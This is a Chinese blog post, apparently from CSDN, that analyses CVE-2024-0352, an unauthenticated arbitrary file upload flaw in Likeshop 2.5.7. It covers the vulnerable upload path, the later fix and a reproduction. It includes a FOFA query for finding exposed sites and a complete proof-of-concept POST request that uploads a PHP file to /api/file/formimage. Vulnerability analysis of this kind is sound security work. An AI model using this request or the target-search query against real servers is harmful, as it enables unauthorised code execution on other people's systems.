CVE-2024-0352 likeshop v2.5.7文件上传漏洞分析

已于 2024-01-29 18:59:05 修改
阅读量976 收藏 9
点赞数 6
分类专栏: PHP代码审计 文章标签: 安全 web安全 php
于 2024-01-29 18:36:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/135918508
版权

本次的漏洞研究基于thinkPHP开发开的一款项目.....

漏洞描述

Likeshop是Likeshop开源的一个社交商务策略的完整解决方案,开源免费版基于thinkPHP开发。Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。

fofa查询语句

icon_hash="874152924" && body="/pc/"

环境搭建

下载https://github.com/likeshop-github/likeshop/releases/tag/2.5.7

漏洞代码审计

server\application\api\controller的File.php文件,路由/api/file/formimage

进入userFormImage方法,FileServer::userFormImages()

107行 创建实例StorageDriver 后调用setUploadFile方法,跟过去

其实调用的是引擎的setUplloadFile方法,是那个引擎呢!

分别为阿里云存储引擎 (OSS) 本地文件驱动 腾讯云存储引擎 (COS) 七牛云存储引擎 存储引擎抽象类(那三个全部继承这个类)

setUploadFile方法只在存储引擎抽象类中存在,因此分析server.php下的setUploadFile方法

我们重点关注上传文件名,文件内容。代码中没有任何过滤的函数,

查看109行 StorageDriver->upload 方法

我们挨个分析这几个引擎类对upload的实现

local类,直接move 没有任何过滤

Aliyun类

剩下的引擎类就不分析了,基本都没有做文件名的后缀检测。

文件上传漏洞可成功利用

后续修复

在修复的版本中,Server.php中进行了文件名的限制

这里校验文件处new了一个Upload对象,该对象内容如下

漏洞复现

进入环境页面设置好sql连接

 等待安装

注册一个账号

登录账号后点击我的 设置自己信息

这里其实是有头像的,点击上传头像

抓包改变content-type 打入payload

实际测试没有cookie 没有token也可成功访问该接口

访问payload文件

payload成功执行 , 漏洞复现成功

附赠payload

POST /api/file/formimage HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: multipart/form-data; boundary=---------------------------348900489633202294591557761619
Content-Length: 248

-----------------------------348900489633202294591557761619
Content-Disposition: form-data; name="file"; filename="b.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------348900489633202294591557761619--

昵称还在想呢
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
nnn2188185的博客
01-17 342
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
漏洞复现--Likeshop任意文件上传(CVE-2024-0352)
qq_53003652的博客
01-16 1522
Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店,商家入驻,平台抽佣+商家独立结算,统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可通过此漏洞上传木马获取服务器权限。
Likeshop文件上传CVE-2024-0352
maxiluo的博客
01-26 1508
Likeshop HTTP POST 请求 File.php userFormImage 无限制上传漏洞
CVE-2024-0352Likeshop任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
02-05 773
Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。
Likeshop任意文件上传(CVE-2024-0352)
weixin_43567873的博客
03-27 76
Likeshop任意文件上传(CVE-2024-0352)
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞
04-16
描述中提到的“在8.5.98基础上,增加了修复CVE-2024-24549拒绝访问漏洞的代码”,这表明Tomcat 8.5.99主要的更新内容是针对一个名为CVE-2024-24549的安全漏洞进行修复。CVE(Common Vulnerabilities and Exposures)...
openssh9.8p1安装升级rpm包,修复CVE-2024-6387漏洞
07-13
1、上传文件到opt目录; 2、yum remove openssh 3、yum localinstall openssh-* 4,检查版本 ssh -V 注意,由于需要卸载oepnssh,需要保持连接状态,否则断开无法连接服务器。并且安装过程中需要访问外网网络。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Likeshop 单商户商城系统 任意文件上传漏洞复现(CVE-2024-0352)
0xSec
11-23 1536
likeshop单商户标准商城系统/api/file/formImage接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
Likeshop userFormImage任意文件上传(CVE-2024-0352)
m0_64366018的博客
01-20 448
注意,在HTTP/2,有时候需要改成 HTTP/1.1,需要看原始网站的数据包。
漏洞复现】likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
失心少年
02-04 232
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。漏洞链接:https://127.0.0.1/api/file/formimage。
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 255
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
多商户商城系统功能拆解31讲-平台端营销-会员充值
adminlikeshop的博客
08-19 330
多商户商城系统,也称为B2B2C(BBC)平台电商模式多商家商城系统。多商户商城系统支持商家入驻加盟,同时满足平台自营、旗舰店等多种经营方式。平台可以通过收取商家入驻费,订单交易服务费,提现手续费,短信通道费等多手段方式,实现整体盈利。
微擎上传php木马,龙兵智能名片上传漏洞修复教程,独立版和微擎版都有此漏洞...
weixin_39585795的博客
03-11 842
今日和代码族群主在群里闲聊,群友聊到了一个关于后门的事情,群主当时在群里提了部分程序官方就自带有漏洞,列举了一部分程序,里面有我正在使用的龙兵名片系统,于是和群主进行了沟通,了解漏洞的原理以及修复方法,于是想到了记录在这里,一方面作为自己的笔记,另一方面如果有网友也遇到了类似的问题,那么可以作为参考去解决。具体的漏洞为龙兵的附件上传功能,可以直接上传PHP文件,可以将php木马直接上传到服务器,然...
微擎任意删除漏洞
Edwin_jade的博客
09-01 327
找到文件“/网站更目录/web/source/founder/display.curl.php ”12行处 $founders = explode(',', $_W['config']['setting']['founder']); 添加 $identity = uni_permission($_W['uid']); if ($identity != ACCOUNT_MANAGE_NAME_FOUNDER && $identity != ACCOUNT_MANAGE_NAME_V.
likeshop】开源商城系统代码有什么好?
adminlikeshop的博客
02-23 653
开源是指软件的源代码开放给任何人自由使用、修改和再分发的概念。开源软件的源代码可以免费获取,用户可以根据自己的需要修改源代码,并且可以将修改后的代码免费分发给其他人使用。开源软件的源代码是公开的,其他人可以查看代码,并且可以提出改进建议。开源软件的源代码可以被多人共同维护和升级,因此开源软件的质量更高,更安全
linux漏洞编号cve-2024-1086
06-15
CVE-2024-1086是一个尚未公开的、假设性的漏洞编号,因为2024年尚未到来,所以目前还没有官方发布的CVE-2024-1086。CVE(Common Vulnerabilities and Exposures)是用于统一标识公开的安全漏洞的标准命名系统,由美国CERT Coordination Center(CERT/CC)维护。 通常情况下,当一个新的漏洞被发现并上报给CVE项目,它会在相应的年份的CVE列表中获得一个唯一的编号。在实际发生之前,具体的漏洞细节(如影响范围、攻击向量、修复建议等)都是保密的,直到安全公告发布或厂商发布安全更新。 如果你对某个已知的CVE感兴趣,比如CVE-2022-xxxx这样的,我可以帮你查找相关的详细信息。不过,由于我无法提供未来尚未公布的漏洞信息,请告诉我你想了解哪个已知的CVE,我会尽我所能为你提供相关信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值